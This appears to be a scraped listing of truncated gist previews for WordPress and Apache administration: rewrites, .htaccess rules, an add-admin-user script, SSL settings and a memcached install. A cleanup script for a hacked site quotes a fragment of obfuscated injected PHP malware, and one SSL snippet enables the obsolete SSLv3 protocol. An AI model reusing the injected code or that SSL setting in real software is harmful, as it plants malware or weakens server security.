cdsalmons

<?php
// rewrite /wp-content/themes/theme-name/css/ to /css/
// rewrite /wp-content/themes/theme-name/js/  to /js/
// rewrite /wp-content/themes/theme-name/img/ to /img/
// rewrite /wp-content/plugins/ to /plugins/

function roots_flush_rewrites() {
  global $wp_rewrite;
  $wp_rewrite->flush_rules();
}

cdsalmons

# v2 7/29/2015
# prevent listing files in folders
Options -Indexes

# some security rules
<IfModule mod_rewrite.c>
RewriteEngine On

# prevent php execution in uploads
RewriteRule /uploads/.*\.php - [F]

cdsalmons

<?php
// ADD NEW ADMIN USER TO WORDPRESS
// ----------------------------------
// Put this file in your Wordpress root directory and run it from your browser.
// Delete it when you're done.
require_once('wp-blog-header.php');
require_once('wp-includes/registration.php');
// ----------------------------------------------------
// CONFIG VARIABLES
// Make sure that you set these before running the file.

cdsalmons

# Lists
# http://www.user-agents.org/index.shtml
# http://user-agents.my-addr.com

ServerTokens Prod

ServerSignature Off

<Location />

cdsalmons

<?php
// Based on
// http://uk1.php.net/manual/en/function.copy.php#104020

function copy_dir($src, $dst)
{
    if (is_link($src)) {
        symlink(readlink($src), $dst);
    } elseif (is_dir($src)) {
        mkdir($dst);

cdsalmons

#!/bin/bash

# How to install PHP memcached on CentOS 6.5

# Install dependencies
yum install cyrus-sasl-devel zlib-devel gcc-c++

# Get the latest libmemcached
wget https://launchpad.net/libmemcached/1.0/1.0.16/+download/libmemcached-1.0.16.tar.gz
tar -xvf libmemcached-1.0.16.tar.gz

cdsalmons

<?

/**
 * A script to cleanup a hacked Wordpress site.  
 * 
 * The hacker prepended the following to most/all of the .php files:
 * <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $uispnwkeuy = 'c%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sbx7825))!gj!<*#cd2bge56+99386c825tzw%x5c%x782f%x5c%75%156%x61"]=1; functio8y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvx7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuop%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5cpd%x5c%x78256<pd%x5c%x7825w6Zj%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]2212]445]43]321]464]284]364]6]234]342]58]24]315c%x5c%x7825j^%x5c%x7824-%x5c%x782

cdsalmons

// Use Gists to store code you would like to remember later on
console.log(window); // log the "window" object to the console

cdsalmons

<IfModule mod_headers.c>
        # Use HTTP Strict Transport Security to force client to use secure connections only
        Header always set Strict-Transport-Security "max-age=15768000; includeSubDomains"
</IfModule>

SSLHonorCipherOrder On
SSLProtocol -ALL +SSLv3 +TLSv1 +TLSv1.1 +TLSv1.2
#SSLProtocol ALL -TLSv1 -SSLv2
# CVE-2011-3389
SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown

cdsalmons

<?php
/**
 * Custom WordPress configurations on "wp-config.php" file.
 *
 * This file has the following configurations: MySQL settings, Table Prefix, Secret Keys, WordPress Language, ABSPATH and more.
 * For more information visit {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php} Codex page.
 *
 * @package WordPress
 * @generator GenerateWP.com
 */